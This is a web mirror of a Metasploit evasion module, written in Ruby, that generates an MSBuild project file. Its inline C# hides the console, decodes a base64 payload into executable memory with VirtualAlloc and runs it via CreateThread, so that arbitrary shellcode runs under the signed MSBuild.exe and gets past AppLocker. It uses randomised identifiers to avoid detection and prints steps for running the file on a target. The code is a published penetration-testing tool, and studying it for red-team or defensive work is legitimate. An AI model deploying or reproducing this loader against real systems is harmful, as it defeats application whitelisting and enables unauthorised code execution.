CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_msbuild.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(update_info(info,

10
      'Name'        => 'Applocker Evasion - MSBuild',

11
      'Description' => %(

12
         This module will assist you in evading Microsoft

13
         Windows Applocker and Software Restriction Policies.

14
         This technique utilises the Microsoft signed binary

15
         MSBuild.exe to execute user supplied code.

16
       ),

17
      'Author'      =>

18
        [

19
          'Nick Tyrer <@NickTyrer>', # module development

20
          'Casey Smith' # msbuild bypass research

21
        ],

22
      'License'     => 'MSF_LICENSE',

23
      'Platform'    => 'win',

24
      'Arch'        => [ARCH_X86, ARCH_X64],

25
      'Targets'     => [['Microsoft Windows', {}]],

26
      'References'  => [['URL', 'https://attack.mitre.org/techniques/T1127/']])

27
    )

28


29
    register_options(

30
      [

31
        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: msbuild.txt)', 'msbuild.txt'])

32
      ]

33
    )

34
  end

35


36
  def build_payload

37
    Rex::Text.encode_base64(payload.encoded)

38
  end

39


40
  def obfu

41
    Rex::Text.rand_text_alpha 8

42
  end

43


44
  def msbuild

45
    esc = build_payload

46
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

47
    <<~HEREDOC

48
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

49
      <Target Name="#{mod[0]}">

50
      <#{mod[1]} />

51
      </Target>

52
      <UsingTask

53
      TaskName="#{mod[1]}"

54
      TaskFactory="CodeTaskFactory"

55
      AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >

56
      <Task>

57
      <Code Type="Class" Language="cs">

58
      <![CDATA[

59
      using System;

60
      using System.Runtime.InteropServices;

61
      using Microsoft.Build.Framework;

62
      using Microsoft.Build.Utilities;

63
      public class #{mod[1]} :  Task, ITask

64
      {

65
      private static Int32 #{mod[2]}=0x1000;

66
      private static IntPtr #{mod[3]}=(IntPtr)0x40;

67
      private static UInt32 #{mod[4]} = 0xFFFFFFFF;

68
      [System.Runtime.InteropServices.DllImport("kernel32")]

69
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

70
      [System.Runtime.InteropServices.DllImport("kernel32")]

71
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

72
      [System.Runtime.InteropServices.DllImport("kernel32")]

73
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

74
      [System.Runtime.InteropServices.DllImport("user32.dll")]

75
      static extern bool ShowWindow(IntPtr #{mod[5]}, int nCmdShow);

76
      [System.Runtime.InteropServices.DllImport("Kernel32")]

77
      private static extern IntPtr GetConsoleWindow();

78
      const int #{mod[6]} = 0;

79
      public override bool Execute()

80
      {

81
      IntPtr #{mod[5]};

82
      #{mod[5]} = GetConsoleWindow();

83
      ShowWindow(#{mod[5]}, #{mod[6]});

84
      string #{mod[7]} = "#{esc}";

85
      byte[] #{mod[8]} = Convert.FromBase64String(#{mod[7]});

86
      byte[] #{mod[9]} = #{mod[8]};

87
      IntPtr #{mod[10]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[9]}.Length, #{mod[2]}, #{mod[3]});

88
      System.Runtime.InteropServices.Marshal.Copy(#{mod[9]}, 0, #{mod[10]}, #{mod[9]}.Length);

89
      IntPtr #{mod[11]} = IntPtr.Zero;

90
      WaitForSingleObject(CreateThread(#{mod[11]}, UIntPtr.Zero, #{mod[10]}, #{mod[11]}, 0, ref #{mod[11]}), #{mod[4]});

91
      return true;

92
      }

93
      }

94
      ]]>

95
      </Code>

96
      </Task>

97
      </UsingTask>

98
      </Project>

99
    HEREDOC

100
  end

101


102
  def file_format_filename(name = '')

103
    name.empty? ? @fname : @fname = name

104
  end

105


106
  def create_files

107
    f1 = datastore['FILENAME'].empty? ? 'msbuild.txt' : datastore['FILENAME']

108
    f1 << '.txt' unless f1.downcase.end_with?('.txt')

109
    file1 = msbuild

110
    file_format_filename(f1)

111
    file_create(file1)

112
  end

113


114
  def instructions

115
    print_status "Copy #{datastore['FILENAME']} to the target"

116
    if payload.arch.first == ARCH_X86

117
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"

118
    else

119
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"

120
    end

121
  end

122


123
  def run

124
    create_files

125
    instructions

126
  end

127
end

128


129